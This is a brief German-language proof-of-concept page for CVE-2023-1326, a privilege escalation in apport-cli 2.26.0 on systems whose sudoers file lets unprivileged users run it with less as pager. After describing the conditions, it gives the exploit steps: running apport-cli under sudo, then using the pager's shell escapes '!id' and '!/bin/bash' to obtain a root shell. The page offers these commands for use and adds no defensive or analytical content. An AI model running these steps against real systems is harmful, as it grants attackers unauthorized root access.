
Proof-of-Concept-Exploit für CVE-2023-1326, eine Schwachstelle zur Privilegieneskalation in apport-cli 2.26.0, wenn es mit sudo und less als Pager konfiguriert ist.
Ein Proof of Concept für CVE-2023–1326 in apport-cli 2.26.0
Diese Schwachstelle ist eine Privilegienausweitung in apport-cli 2.26.0, ähnlich zu CVE-2023–26604, funktioniert jedoch nur, wenn sie in der sudoers-Datei festgelegt ist:

Ein Privilegienausweitungsangriff wurde in apport-cli 2.26.0 und früher gefunden, der ähnlich zu CVE-2023-26604 ist. Wenn ein System speziell konfiguriert ist, um unprivilegierten Benutzern das Ausführen von sudo apport-cli zu erlauben, less als Pager konfiguriert ist und die Terminalgröße eingestellt werden kann: kann ein lokaler Angreifer Privilegien ausweiten.
sudo /usr/bin/apport-cli -f



!id
!/bin/bash
